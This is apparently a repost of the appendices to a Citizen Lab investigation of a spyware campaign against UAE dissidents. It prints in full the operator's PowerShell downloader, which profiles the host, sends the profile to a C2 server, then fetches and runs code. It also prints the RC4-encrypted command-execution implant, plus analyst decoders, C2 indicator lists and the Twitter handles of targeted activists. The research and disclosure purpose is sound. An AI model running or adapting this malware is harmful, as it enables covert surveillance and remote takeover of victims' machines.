Sunday, May 29, 2016

Keep Calm and (Don’t) Enable Macros: Appendices

from Publications - The Citizen Lab

Appendices

See our original report here.

Appendix A: Stage One PowerShell Command

try
{
    $path = "%temp%"
    $url = "http://ift.tt/1qVME9f"
    $extension = "ps1"

    $guid = (get-wmiobject win32_computersystemproduct).UUID

    $tmp = get-wmiobject win32_operatingsystem
    $osinfo = "{"
    $osinfo = $osinfo + '"systemdirectory":"'+$tmp.systemdirectory+'",'
    $osinfo = $osinfo + '"buildnumber":"'+$tmp.buildnumber+'",'
    $osinfo = $osinfo + '"registereduser":"'+$tmp.registereduser+'",'
    $osinfo = $osinfo + '"serialnumber":"'+$tmp.serialnumber+'",'
    $osinfo = $osinfo + '"version":"'+$tmp.version+'"'
    $osinfo = $osinfo + "}"

    $tmp = get-wmiobject win32_computersystem
    $sysinfo = "{"
    $sysinfo = $sysinfo + '"manufacturer":"'+$tmp.manufacturer+'",'
    $sysinfo = $sysinfo + '"model":"'+$tmp.model+'",'
    $sysinfo = $sysinfo + '"name":"'+$tmp.name+'",'
    $sysinfo = $sysinfo + '"primaryownername":"'+$tmp.primaryownername+'",'
    $sysinfo = $sysinfo + '"totalphysicalmemory":"'+$tmp.totalphysicalmemory+'"'
    $sysinfo = $sysinfo + "}"

    $dotnet_array = get-childitem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | get-itemproperty -name version -EA 0 | where {$_.pschildname -match '^(?!S)\p{L}'}
    for ($i=0; $i -lt $dotnet_array.length; $i++){$dotnet = $dotnet + '"'+$dotnet_array[$i].Version+'",'}
    $dotnet = '[' + $dotnet.substring(0, $dotnet.length-1) + ']'

    $info = '{'
    $info = $info + '"guid":"'+$guid+'",'
    $info = $info + '"osinfo":'+$osinfo+','
    $info = $info + '"sysinfo":'+$sysinfo+','
    $info = $info + '"dotnet":'+$dotnet+''
    $info = $info + '}'
    $info_64 = [system.convert]::tobase64string([system.text.encoding]::unicode.getbytes($info))

    # send, receive
    $client = new-object system.net.webclient
    $data = $client.downloadstring("$url/?info=$info_64")

    if([string]::IsNullOrEmpty($data)){exit}

    # drop
    $abspath = [system.environment]::expandenvironmentvariables($path) + "\$guid.$extension"
    [io.file]::writeallbytes($abspath, [convert]::frombase64string($data))

    # execute
    iex $abspath
} catch {}
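The Stage One script above fingerprints the host, serialises the result as JSON, encodes it as UTF-16LE ([System.Text.Encoding]::Unicode) and then base64, and sends it as the `info` query parameter of a GET to the C2. The following Python is an added analyst-side example, not code from the report or from the operator: it recovers that profile from a URL as it would appear in a web-proxy log, and flags lines either by a known Stage One C2 host (a subset of the Appendix F list) or, for hosts not yet on a blocklist, by the beacon structure itself. The log layout ("client host method url"), the sample profile values, the placeholder UUID and all function names are constructed for the example.

```python
import base64
import json
from urllib.parse import urlsplit, unquote

# Subset of the Stage One C2 domains listed in Appendix F, used here as an indicator set.
STAGE_ONE_DOMAINS = {
    "adlinkmetric.com", "adlinkmetrics.com", "clickstatistic.com",
    "rapidlinkhit.com", "windowshealthcheck.com",
}
# Top-level keys the Stage One script always places in its profile JSON.
BEACON_KEYS = {"guid", "osinfo", "sysinfo", "dotnet"}


def _query_param(query, name):
    """Return the percent-decoded value of `name` from a raw query string.
    parse_qs() is deliberately not used: it turns '+' into a space, which corrupts base64."""
    for pair in query.split("&"):
        key, sep, value = pair.partition("=")
        if sep and key == name:
            return unquote(value)
    return None


def decode_stage_one_beacon(url):
    """Return the profile dict carried by a Stage One beacon URL, or None if `url` is not one.
    Wire format from Appendix A: JSON -> UTF-16LE -> base64 -> ?info=<value>."""
    raw = _query_param(urlsplit(url).query, "info")
    if not raw:
        return None
    raw += "=" * (-len(raw) % 4)            # restore padding a proxy may have dropped
    try:
        profile = json.loads(base64.b64decode(raw, validate=True).decode("utf-16-le"))
    except ValueError:                        # covers binascii.Error, UnicodeDecodeError, JSONDecodeError
        return None
    if not isinstance(profile, dict) or not BEACON_KEYS.issubset(profile):
        return None
    return profile


def scan_proxy_log(lines):
    """Return (client, host, reason, profile) for each line that looks like Stage One traffic.
    Constructed log layout: 'client host method url'. A line is flagged for a known C2 host,
    or for a decodable info= beacon to any host (catches infrastructure not yet on the list)."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, host, _method, url = fields[:4]
        profile = decode_stage_one_beacon(url)
        if host in STAGE_ONE_DOMAINS:
            hits.append((client, host, "known Stage One C2 domain", profile))
        elif profile is not None:
            hits.append((client, host, "info= beacon structure on unlisted host", profile))
    return hits


def build_sample_beacon_url(host, profile):
    """Encode `profile` the way the Stage One script does, to construct test traffic only."""
    info_64 = base64.b64encode(
        json.dumps(profile, separators=(",", ":")).encode("utf-16-le")).decode("ascii")
    return "http://%s/?info=%s" % (host, info_64)


# Constructed sample profile; the UUID and serial are placeholders, not a real machine.
SAMPLE_PROFILE = {
    "guid": "00000000-0000-0000-0000-000000000000",
    "osinfo": {"systemdirectory": "C:\\Windows\\system32", "buildnumber": "7601",
               "registereduser": "user", "serialnumber": "00000-000-0000000-00000",
               "version": "6.1.7601"},
    "sysinfo": {"manufacturer": "Example Inc.", "model": "Example Model", "name": "WORKSTATION-1",
                "primaryownername": "user", "totalphysicalmemory": "4294967296"},
    "dotnet": ["2.0.50727.5420", "4.5.51641"],
}

# Constructed proxy log: a benign request, a beacon to a listed C2, a beacon to an unlisted host,
# and a request whose info= value is not a beacon at all.
SAMPLE_LOG = [
    "10.0.0.15 www.example.com GET http://www.example.com/index.html",
    "10.0.0.15 windowshealthcheck.com GET " + build_sample_beacon_url("windowshealthcheck.com", SAMPLE_PROFILE),
    "10.0.0.22 cdn.example.net GET " + build_sample_beacon_url("cdn.example.net", SAMPLE_PROFILE),
    "10.0.0.22 cdn.example.net GET http://cdn.example.net/?info=notbase64!!",
]

if __name__ == "__main__":
    for client, host, reason, profile in scan_proxy_log(SAMPLE_LOG):
        print(client, host, reason, ("guid=%s" % profile["guid"]) if profile else "")
```

The structural check matters because the Stage One domains were disposable: a proxy rule keyed on the UTF-16LE-then-base64 JSON shape keeps working after the operator rotates hosts, while the domain set alone does not.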
Appendix B: Stage Two PowerShell Command

$QvF=""
$OCs="9026ef20"
$SLlWfL="RaH80/bk5xhNn4bISBUTPQ=="
# Launcher script run by the "IE Web Cache" scheduled task; deleted on task type 9 below
$mxExBh="$ENV:Temp\IEWebCache.vbs"

# Main loop: check in every 600 seconds with "&", run each task the C2 returns, post the result
function UwDSkX{
    try{add-type $tWRv}catch{}
    $script:SLlWfL=[system.convert]::frombase64string($SLlWfL)
    $script:QvF=(get-wmiobject win32_computersystemproduct).UUID.substring(0,8)
    while($true){
        try{
            $kcLJjB=tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes('&'),$SLlWfL))
            if($kcLJjB){
                $yDotaj=[RC4]::Crypt($kcLJjB,$SLlWfL)
                $yDotaj=[system.text.encoding]::utf8.getstring($yDotaj)
                try{
                    # Tasks are separated by "&&&"; fields (id, type, base64 command) by "&&"
                    foreach($MpkgwL in $yDotaj -split "&&&"){
                        $gZb=""
                        $wQD=$false
                        $rNlvFz=$MpkgwL -split "&&"
                        $gZb += "`"ci`":`"$([string]$rNlvFz[0])`""
                        $gZb += ",`"t`":`"$([string]$rNlvFz[1])`""
                        switch($rNlvFz[1]){
                            # Type 9: uninstall (stop and delete the scheduled task, remove the launcher)
                            "9"{
                                schtasks /end /tn `"IE Web Cache`" | out-null
                                schtasks /delete /f /tn `"IE Web Cache`" | out-null
                                remove-item $mxExBh
                                $gZb += ",`"c`":0"
                                $wQD=$true
                            }
                            # Any other type: base64-decoded PowerShell run with iex, output returned as "c"
                            default{
                                $VAMR=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($rNlvFz[2]))
                                $WLpyjj=iex($VAMR)
                                $gZb += ",`"c`":`"$WLpyjj`""
                            }
                        }
                        $Nni=[RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb),$SLlWfL)
                        tYRy($Nni)
                        if($wQD){exit}
                    }
                }catch{
                    try{
                        $gZb += ",`"ec`":`"$([string]$lastexitcode)`""
                        $gZb += ",`"c`":`"$($_.exception.message)`""
                        tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb), $SLlWfL))
                    }catch{
                    }
                }
            }
        }catch{}
        Start-Sleep -s 600
    }
}

# Transport: POST "<$OCs><first 8 chars of UUID><base64(RC4 payload)>" to the C2, return the raw response body
function tYRy($hxWR){
    $eVFXy=$null
    $HXWL=New-Object -ComObject "Msxml2.ServerXMLHTTP.6.0"
    $HXWL.open('POST',"http://ift.tt/1NXuZJs")
    $HXWL.setrequestheader("Content-length",$hxWR.length)
    $HXWL.setrequestheader("User-Agent", "Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)")
    $HXWL.setrequestheader("Connection","close")
    # Option 2 = SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS; 13056 ignores all certificate errors
    $HXWL.setoption(2,13056)
    $HXWL.send("$OCs$QvF" + [system.convert]::tobase64string($hxWR))
    $eVFXy=$HXWL.responsebody
    return $eVFXy
}

# RC4 helper compiled at runtime with Add-Type; the same call encrypts and decrypts
$tWRv = @"
using System.Text;
public static class RC4{
    public static byte[] Crypt(byte[] input, byte[] key){
        byte[] inbytes=input;
        byte[] result=new byte[inbytes.Length];
        int x, y, j=0;
        int[] box=new int[256];
        for (int i=0; i < 256; i++){box[i]=i;}
        for (int i=0; i < 256; i++){
            j=((char)key[i % key.Length] + box[i] + j) % 256;
            x=box[i];
            box[i]=box[j];
            box[j]=x;
        }
        x=0;
        y=0;
        for(int i = 0; i < inbytes.Length; i++){
            x=(x + 1) % 256;
            y=(y + box[x]) % 256;
            j=box[x];
            box[x]=box[y];
            box[y]=j;
            result[i]=(byte)(inbytes[i] ^ box[(box[x] + box[y]) % 256]);
        }
        return result;
    }
}
"@

# Single-instance guard via a global mutex
try{
    $aTKs=new-object -typename system.threading.mutex -argumentlist $false, "Global\YZi"
    if($aTKs.waitone(100)){UwDSkX}
}finally{try{$aTKs.releasemutex()}catch{}}
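Every message the Stage Two script exchanges with its C2 is RC4-encrypted with the key embedded in `$SLlWfL`, and every POST body is the constant `$OCs` ("9026ef20"), the first eight characters of the machine UUID, and the base64 of the ciphertext. The Python below is an added analyst-side example, not code from the report or from the operator: it reimplements the C# `Crypt` routine from the here-string, strips the prefix and victim id from a captured POST body, decrypts it, and lists the tasks in a tasking response (id, type, decoded command, or the type-9 uninstall order) without executing any of them. The sample exchange is constructed by encrypting with the same key inside the block; it is not a real capture, the victim id is a placeholder, and the function names are the example's own.

```python
import base64
import json

# Key and constants taken from the Stage Two script above.
KEY = base64.b64decode("RaH80/bk5xhNn4bISBUTPQ==")   # $SLlWfL, 16 bytes
PREFIX = "9026ef20"                                   # $OCs, prepended to every POST body


def rc4(data, key):
    """RC4 exactly as the embedded C# Crypt() does it: KSA over 256 bytes, then PRGA XOR.
    Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_stage_two_post(body):
    """Split a captured POST body into (victim id, plaintext); None if it is not Stage Two traffic.
    Wire format: "9026ef20" + first 8 chars of the machine UUID + base64(RC4(payload))."""
    if len(body) < 16 or not body.startswith(PREFIX):
        return None
    victim_id = body[8:16]
    try:
        blob = base64.b64decode(body[16:], validate=True)
    except ValueError:
        return None
    return victim_id, rc4(blob, KEY).decode("utf-8", errors="replace")


def parse_tasking(response_body):
    """Decrypt a tasking response and list the tasks it carries, without running any of them.
    Tasks are separated by "&&&", fields by "&&": task id, type, base64(command)."""
    text = rc4(response_body, KEY).decode("utf-8", errors="replace")
    tasks = []
    for item in text.split("&&&"):
        fields = item.split("&&")
        if len(fields) < 2:
            continue
        task = {"ci": fields[0], "t": fields[1]}
        if fields[1] == "9":
            # Type 9 is the self-removal order: delete the "IE Web Cache" task and IEWebCache.vbs.
            task["action"] = "uninstall"
        else:
            try:
                task["command"] = base64.b64decode(fields[2] if len(fields) > 2 else "").decode("utf-8")
            except ValueError:
                task["command"] = None
        tasks.append(task)
    return tasks


def parse_result(plaintext):
    """Parse the '"ci":"..","t":"..","c":".."' fragment a victim posts back. The script never adds
    the outer braces, so they are added here; raw command output containing quotes or backslashes
    is not valid JSON and yields None."""
    try:
        return json.loads("{" + plaintext + "}")
    except ValueError:
        return None


def _wire(plaintext):
    """Constructed helper: encode a plaintext the way the implant would, to build test traffic."""
    return base64.b64encode(rc4(plaintext.encode("utf-8"), KEY)).decode("ascii")


SAMPLE_VICTIM_ID = "4c4c4544"                     # constructed placeholder, not a real UUID prefix
SAMPLE_CHECKIN = PREFIX + SAMPLE_VICTIM_ID + _wire("&")
# Constructed tasking: one command task and one uninstall order, as the C2 would encrypt them.
SAMPLE_TASKING = rc4("&&&".join([
    "&&".join(["17", "1", base64.b64encode(b"whoami").decode("ascii")]),
    "&&".join(["18", "9", ""]),
]).encode("utf-8"), KEY)
SAMPLE_RESULT = PREFIX + SAMPLE_VICTIM_ID + _wire('"ci":"17","t":"1","c":"user1"')

if __name__ == "__main__":
    print("check-in:", decode_stage_two_post(SAMPLE_CHECKIN))
    for task in parse_tasking(SAMPLE_TASKING):
        print("task:", task)
    victim, text = decode_stage_two_post(SAMPLE_RESULT)
    print("result from", victim, "->", parse_result(text))
```

Because the key is static and the prefix is a constant, the first 16 bytes of every POST body are the same across victims apart from the eight-character UUID fragment; that fixed prefix, together with the hard-coded MSIE 10.6 User-Agent and a body that is otherwise pure base64, is the simplest network signature for this stage.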
Appendix C: JavaScript Profiling File

Due to its large size, this appendix is available in an external Google Document:
http://ift.tt/1qVMoXM
Appendix D: Public Stealth Falcon Tweets

Attacker Victim Link
@Bu_saeed2 @Kh_OZ http://twitter.com/Bu_saeed2/status/156781983983349760
@Bu_saeed2 @saalaam25 http://twitter.com/Bu_saeed2/status/158272650995695616
@Bu_saeed2 @alshamsi789 http://twitter.com/Bu_saeed2/status/156785619744473088
@Bu_saeed2 @BdrBakalla http://twitter.com/Bu_saeed2/status/156406670866653184
@Bu_saeed2 @omran83 http://twitter.com/Bu_saeed2/status/158267593269063680
@Bu_saeed2 @abu_sa33d https://twitter.com/Bu_saeed2/status/158269006451707904
@islam_way_2030 @Morsyuae http://twitter.com/islam_way_2030/status/212563401761755137
@islam_way_2030 @WeldBudhabi https://twitter.com/islam_way_2030/status/232392466760863744
@islam_way_2030 @Rmadanhom https://twitter.com/islam_way_2030/status/232392808336588800
@islam_way_2030 @intihakat https://twitter.com/islam_way_2030/status/232393358243401728
@islam_way_2030 @bomsabih https://twitter.com/islam_way_2030/status/232394930285318144
@islam_way_2030 @hwghp https://twitter.com/islam_way_2030/status/232395293449146368
@um_zainab123 @haalreem http://twitter.com/um_zainab123/status/255210220907802624
@um_zainab123 @alsalam45 http://twitter.com/um_zainab123/status/255230862914899969
@1a1_ahmed @magdy_masood1 http://twitter.com/1a1_ahmed/status/367590431762051072
@MiriamKhaled @uaelionheart http://twitter.com/MiriamKhaled/status/156804441436205056
@MiriamKhaled @uaepolitician http://twitter.com/MiriamKhaled/status/156795446910664704
@MiriamKhaled @bosalim77 http://twitter.com/MiriamKhaled/status/156756400108867584
@MiriamKhaled @zayedson7 http://twitter.com/MiriamKhaled/status/156803937482190848
@MiriamKhaled @71uae https://twitter.com/MiriamKhaled/status/156625204280434688
@JJory22 @helalsalem11 https://twitter.com/JJory22/status/159144594574020608
@pooruae @2011national https://twitter.com/pooruae/status/156766408137646080
@pooruae @youae_dxb https://twitter.com/pooruae/status/156766841702854657
@r7aluae2 @newbedon https://twitter.com/r7aluae2/status/156418043424157696

Additional Details

• @saalaam25 was targeted on 14 January 2012. The account stopped tweeting on 5 December 2014. The account tweeted about political issues in the UAE.
• @alshamsi789 was targeted on 10 January 2012. The account is still active, and tweets about political issues in the UAE.
• @BdrBakalla was targeted on 9 January 2012. The account is still active, and gives its location as “Abu Dhabi.”
• @morsyuae was targeted on 12 June 2012. The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
• @HaAlReem was targeted on 7 October 2012. The account stopped tweeting on 17 August 2013. The account appeared to tweet in solidarity with political prisoners in the UAE.
• @alsalam45 was targeted on 7 October 2012. The account stopped tweeting on 13 August 2015. The account appeared to tweet in solidarity with political prisoners in the UAE.
• @magdy_masood1 was targeted on 14 August 2013. The account stopped tweeting on 30 July 2014. The account appeared to tweet about Gaza, and against Egyptian President Sisi.
• @UAELionHeart was targeted on 10 January 2012. The account stopped tweeting on 30 June 2013. The account appeared to tweet in solidarity with political prisoners in the UAE.
• @uaepolitician was targeted on 10 January 2012. The account appears to no longer exist.
• @bosalim77 was targeted on 10 January 2012. The account is currently suspended.
• @ZayedSon7 was targeted on 10 January 2012. The account appears to no longer exist.
• @helalsalem11 was targeted on 16 January 2012. The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
• @2011national, now renamed to @2013national, was targeted on 10 January 2012. The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.
• @abu_sa33d was targeted on 14 January 2012. The account is still active, and appears to tweet both Jihadi content, and solidarity with political prisoners in the UAE.
• @YouAE_Dxb was targeted on 10 January 2012. The account appears to no longer exist.
• @hwghp was targeted on 5 August 2012. The account is still active, and describes itself as “in solidarity with the UAE detainees.” The account appears to tweet in solidarity with political prisoners in the UAE.
• @Rmadanhom, now renamed to @Duaamadloom, was targeted on 5 August 2012. The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

Appendix E: Results of aax.me Scan

Due to its large size, this appendix is available in an external Google Sheet:

http://ift.tt/1NXvfrS

Appendix F: Indicators of Targeting

Domains (Attack on Donaghy)

aax.me
adhostingcache.com
adhostingcaches.com
incapsulawebcache.com

IPs (Attack on Donaghy)

83.125.20.162
87.120.37.83
95.215.44.37

Stage One C2 Server IP Addresses

103.208.86.23
131.72.136.224
185.62.188.163
185.86.148.245
193.105.134.244
37.59.138.119
45.125.244.196
46.183.221.240
87.121.52.96
91.219.237.142
94.242.202.168
95.183.50.230
95.183.51.164
95.183.51.32

Stage One C2 Server Domains

adlinkmetric.com
adlinkmetrics.com
bestairlinepricetags.com
clickstatistic.com
fasttravelclearance.com
optimizedimghosting.com
rapidlinkhit.com
safeadspace.com
simpleadbanners.com
tinyimagehosting.com
windowshealthcheck.com

Stage Two C2 Server IP Addresses

103.193.4.112
107.181.128.99
151.80.141.155
151.80.158.81
151.80.95.42
158.69.3.165
178.17.170.106
178.17.170.183
178.17.171.104
178.17.171.234
178.17.174.21
185.112.82.4
185.117.73.169
185.141.25.225
185.24.233.110
185.24.233.202
185.24.234.15
185.61.148.176
185.61.148.85
185.61.149.2
185.62.190.127
185.77.129.103
185.86.148.46
185.86.148.55
185.86.149.116
185.99.132.210
188.0.236.83
188.165.80.78
190.10.10.189
190.123.45.141
190.123.45.147
193.105.134.10
193.105.134.13
198.50.177.201
199.201.121.148
200.122.181.117
212.56.214.42
37.59.122.150
37.59.138.117
46.183.219.81
46.183.221.187
46.183.221.230
46.183.221.244
5.149.252.143
5.154.190.120
5.154.190.159
5.9.173.181
78.46.254.161
84.200.16.63
87.120.37.83
87.121.52.95
91.216.245.56
91.236.116.210
91.236.116.44
92.222.66.2
93.174.88.206
94.102.56.140
94.102.56.141
94.23.183.9
94.242.232.13
95.183.50.53
95.183.51.133
95.183.51.21
95.183.53.191
95.215.44.165
95.215.44.2
95.215.44.207

Stage Two C2 Server IP Addresses (Historical)

119.18.57.236
119.18.58.26
124.217.246.199
136.243.250.168
178.17.170.102
178.17.171.173
185.45.192.136
185.62.188.138
185.62.189.16
190.10.9.219
192.71.218.164
198.105.120.51
198.105.122.70
198.105.125.32
199.127.226.243
199.201.121.144
31.220.43.237
46.19.141.188
46.19.143.233
46.28.202.130
46.28.202.93
5.1.88.170
5.196.140.50
5.199.171.40
5.199.171.61
87.117.255.177
87.121.52.170
93.174.88.198
95.183.49.134
95.215.44.251

Stage Two C2 Server Domains

adobereaderupdater.com
airlineadverts.com
akamai-host-network.com
akamai-hosting-network.com
akamaicachecdn.com
akamaicloud.net
akamaicss.com
akamaihostcdn.net
akamaiwebcache.com
appleimagecache.com
burst-media.com
cachecontent.com
cdn-logichosting.com
cdnimagescache.com
chromeupdater.com
cloudburstcdn.net
cloudburstercdn.net
cloudimagecdn.com
cloudimagehosters.com
contenthosts.com
contenthosts.net
dnsclienthelper.com
dnsclientresolver.com
domainimagehost.com
dotnetupdatechecker.com
dotnetupdates.com
dropboxsyncservice.com
edgecacheimagehosting.com
flashplayersupdates.com
flashplayerupdater.com
iesafebrowsingcache.com
iesaferbrowsingcache.com
javaupdatecache.com
javaupdatersvc.com
javaupdatescache.com
javaupdatesvc.com
limelightimagecache.com
livewebcache.com
media-providers.net
mediacachecdn.com
mediacachecdn.net
mediacloudsolution.com
mediacloudsolutions.net
mediaimagecache.com
mediaproviders.net
ministrynewschannel.com
ministrynewsinfo.com
msofficesso.com
msofficeupdates.com
mswindowsupdater.com
netassistcache.com
netcloudcdn.com
optimizercache.com
oraclejavaupdate.com
oraclejavaupdater.com
printspoolerservices.com
safeadvertimgs.com
webanalyticstats.com
wincertificateupdater.com
winconnectors.com
windefenderupdater.com
windowsconnector.com
windowsdefenderupdater.com
windowsearchcache.com
windowspatchmanager.com
windowssearchcache.com
windowsupdatecache.com
windowsupdatescache.com

Related Domains

amnkeysvc.com
amnkeysvcs.com
scheduledupdater.com
yeastarr.com

Suspected Attack Domains

velocityfiles.com
call4uaefreedom.com
uaefreedom.com (on or after October 7, 2012)
a7rarelemarat.com
al7ruae2014.com

Social Media or Email Accounts

the_right_to_fight@openmailbox.org
andrew.dwight389@outlook.com
@a7rarelemarat
@islam_way_2030
@bu_saeed2
@um_zainab123
@1a1_ahmed
@miriamkhaled
@JJory22
@pooruae
@r7aluae2
@Dwight389

Related Social Media Accounts

@al7ruae2014 (Instagram)
@FreeUAE2012

Appendix G: No Evidence of APT28 Connection

Five (or six) of the domains we linked to our operator were registered using anonymousbitcoindomains[.]com (ABCD), a now-defunct “anonymous” registration service that accepted payment in Bitcoin, through which it appears that only about 89 domains were ever registered (all between 2014-07-09 and 2015-04-30).

The service touted the small amount of information collected from its users:

“You don’t need to create an account when you buy a hot dog in the streets, do you? Neither should you when you want to register a domain name. Just like the hot dog sales dude, we validate the money you pay with. And if that’s good, then we’re happy to sell you a domain name!”

There appears to be a belief in the security community that a significant amount of ABCD activity involved a group known as APT28. APT28 is said to be supported by the Russian Government [1] and has targeted “NATO, governments of Russia’s neighbors, and U.S. defense contractors” [2]. For instance, PwC Threat Intelligence lists one of the domain names we believe is related to our operator, netassistcache.com, as an APT28 domain. Though the attacks we profile in this report do not appear to align with known APT28 objectives, and the malware sent to Donaghy does not relate to known APT28 malware, we nevertheless feel compelled to examine whether our operator may be related to APT28. We outline our research below; we do not find any strong indications that our operator is related to APT28.

A Comparison of Registration Dates

Below, we list the five ABCD domains we linked to our operator, and a sixth ABCD domain that we believe may belong to our operator:

ABCD Domain                  Registration Date
windowsearchcache.com        2014-11-13
adhostingcache.com           2014-12-01
netassistcache.com           2015-02-25
mediacloudsolution.com       2015-03-05
al7ruae2014.com (possible)   2015-03-05
contenthosts.net             2015-03-08

We noted that several APT28 domains were registered on 2015-03-05, the same day as one of our operator’s domains (and a second domain that may belong to our operator):

al7ruae2014[.]com (possibly our operator)
defencereview[.]net
intelnetservice[.]com (APT28) [3]
intelsupport[.]net (APT28) [4]
mediacloudsolution[.]com (our operator)
microsoftdriver[.]com (APT28) [5]
nato-int[.]com
osce-military[.]org
windowsappstore[.]net (APT28) [6]

However, there is no further evidence that the APT28 domains are related to our operator’s domains (e.g., there is no overlap in passive DNS).

A “suspension” of ABCD domains

On 2 July 2015, the DNS entries for at least 21 domain names registered via ABCD were updated to IP address 109.71.51.58, according to passive DNS data. Six of these domain names appear to be directly related to APT28 via public information: microsoftdriver.com and windowsappstore.net appear in an APT28 sample [7], dailyforeignnews.com was documented distributing APT28 malware [8], and diplomatnews.org, worldpoliticsnews.org, and uz-news.org were documented hosting the APT28 exploit kit [9].

The Internet Archive records that microsoftdriver.com returned an apparently nonstandard “Notice: Suspended domain” page 12 days after the transfer, on 14 July 2015 [10]. We also identified another ABCD domain, bagacamesmo.biz, which was redirected to 109.71.51.58 on 23 September 2014. Five days later, the Internet Archive records that it displayed a substantially similar notice of domain suspension, except that it suggested the suspension was in relation to the “FraudWatch International Security Operations Centre” [11]. The reference to FraudWatch appears to be a reference to the eponymous provider of brand-protection services, including website takedown services [12]. The Internet Archive records that the suspension message on bagacamesmo.biz was later updated to the same message as the one on microsoftdriver.com [13]. The only other instance we found of an ABCD domain whose DNS was changed to 109.71.51.58 was policeoracle.org, which was changed on 18 April 2015. We note that the “Last-Modified” header for microsoftdriver.com reads 17 April 2015.

Therefore, our hypothesis is that ABCD controls 109.71.51.58. When they conducted what appears to be their first domain “suspension” (bagacamesmo.biz, perhaps upon request from FraudWatch), they created a custom suspension page indicating this. Perhaps their second domain “suspension” (policeoracle.org) was on request from a different party, so they updated their page to delete the reference to FraudWatch.

One of the at least 21 domain names suspended in this manner on 2 July 2015 was windowsearchcache.com. However, the domain appears to have been “un-suspended” on 22 July 2014, in that its DNS entry from before the suspension was restored. It is the only ABCD domain name we were able to identify that was suspended and then un-suspended. It was also the only suspended ABCD domain name that we were able to trace to our operator. We are not sure which party requested the suspension, nor why ABCD decided to “un-suspend” windowsearchcache.com.

We are unaware of any evidence linking APT28 to windowsearchcache.com. That windowsearchcache.com appears to be the only un-suspended ABCD domain (and the only one we claim is not APT28) suggests that it may be unrelated to APT28 activity.

Footnotes

[1] http://ift.tt/1xVcUAR
[2] http://ift.tt/1dIAYzU
[3] http://ift.tt/21BbU3g
[4] http://ift.tt/21BbU3g
[5] http://ift.tt/1qVMnmL
[6] http://ift.tt/1qVMnmL
[7] http://ift.tt/1qVMnmL
[8] http://ift.tt/1EQz3GC
[9] http://ift.tt/1qVMYEM
[10] http://ift.tt/1NXvbbL
[11] http://ift.tt/1qVMfni
[12] http://ift.tt/1NXv9AG
[13] http://ift.tt/1qVM4YX
